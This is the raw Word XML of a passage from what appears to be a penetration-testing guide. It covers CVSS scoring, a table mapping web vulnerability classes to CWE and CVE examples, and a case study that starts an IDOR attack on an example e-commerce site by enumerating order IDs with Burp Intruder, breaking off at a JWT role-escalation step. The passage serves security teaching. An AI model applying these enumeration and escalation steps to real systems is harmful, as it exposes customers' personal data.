        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="65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Selection &amp; Reasoning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Attack Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="65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Network (N) — exploitable remotely over internet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Attack Complexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="65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Low (L) — reproducible consistently, no special conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Privileges Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="65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None (N) — no authentication needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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User Interaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="65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None (N) — attacker acts alone</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="65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Unchanged (U) — only the database is impacted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Confidentiality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="65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High (H) — all database records readable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="65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High (H) — data can be modified via INSERT/UPDATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Availability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="65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Low (L) — could disrupt queries but not full DoS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS Vector: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Score: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">8.8 — HIGH severity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Calculator: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use https://www.first.org/cvss/calculator/3.1 to compute all scores</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ CVSS Temporal &amp; Environmental Metrics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Beyond the Base score, CVSS includes Temporal metrics (how exploitable is the CVE right now?) and Environmental metrics (how critical is this asset to your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Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Exploit Code Maturity (E)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Unproven / POC / Functional / High — does a working exploit exist publicly?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Remediation Level (RL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Official Fix / Temporary Fix / Workaround / Unavailable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Report Confidence (RC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Unknown / Reasonable / Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Modified Base Metrics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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Override base metrics to reflect your specific environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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CIA Requirements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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Low/Medium/High — how important is C/I/A to THIS specific asset?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Pro Tip: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Always include both Base and Environmental CVSS scores in client reports. A CRITICAL database SQLi on a dev server may have a lower Environmental score than the same bug on the production payments API.</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4.3  Key CVE–CWE–CVSS Mappings for Common Web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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5060"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:left w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:bottom w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:right w:val="single" w:color="1E3A5F" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0D1E35" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00A6FF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE Example &amp; CVSS</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SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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CWE-89</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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CVE-2012-2122 (MySQL auth bypass) — CVSS 7.5 HIGH</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Stored XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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CWE-79</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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CVE-2020-8816 (Pi-hole stored XSS→RCE) — CVSS 8.0 HIGH</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SSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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CWE-918</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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CVE-2019-8451 (Atlassian Jira) — CVSS 5.3 MEDIUM</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XXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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CWE-611</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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CVE-2019-3396 (Confluence XXE) — CVSS 9.8 CRITICAL</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Log4Shell RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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CWE-917</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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CVE-2021-44228 — CVSS 10.0 CRITICAL</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Broken Auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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CWE-287</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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CVE-2022-22972 (VMware vCenter) — CVSS 9.8 CRITICAL</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IDOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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CWE-639</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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CVE-2020-35489 (WordPress plugin) — CVSS 9.8 CRITICAL</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Path Traversal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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CWE-22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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CVE-2021-41773 (Apache httpd) — CVSS 7.5 HIGH</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Deserialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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CWE-502</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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CVE-2015-4852 (WebLogic) — CVSS 9.8 CRITICAL</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Weak JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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CWE-347</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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CVE-2018-0114 (Cisco) — CVSS 9.8 CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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onsolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FDBFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Open Redirect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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CWE-601</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5060"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:left w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:bottom w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:right w:val="single" w:color="1E3A5F" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="060F1C" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="75"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="75"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="C8D8F0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2019-16089 — CVSS 6.1 MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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onsolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FDBFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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CWE-352</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5060"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:left w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:bottom w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:right w:val="single" w:color="1E3A5F" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="030A14" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="75"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="75"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="C8D8F0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2020-7379 (Metasploit Framework) — CVSS 8.8 HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
        <w:spacing w:before="0" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6B35"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">SECTION 5: REAL-WORLD CASE STUDIES</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3B6EFF" w:sz="3" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C42"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  5.1  Case Study — E-Commerce Platform IDOR + Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Engagement Context</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Black-box web application pentest of a mid-sized e-commerce platform. Scope: *.shopexample.com. Testing with two created accounts: standard user and premium user.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Discovery Phase</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Configured Burp Suite Pro with scope set to *.shopexample.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Browsed application — all traffic captured in Proxy History</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified GET /api/v1/orders/{order_id} endpoint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Own order returns: GET /api/v1/orders/10482 — full order details</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Exploitation — IDOR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sent request to Repeater</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Changed order_id from 10482 to 10481 (sequential, predictable)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Response: 200 OK — full order details of another user (name, address, payment last 4)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Iterated IDs 1 through 20000 using Intruder (Sniper, number payload 1-20000)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified 18,432 accessible orders — complete customer PII exposure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Escalation — Admin Panel Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Discovered /api/v1/admin/orders endpoint in JavaScript files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sent with standard user token — received 403</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In Proxy, observed admin user had role:admin in their JWT payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
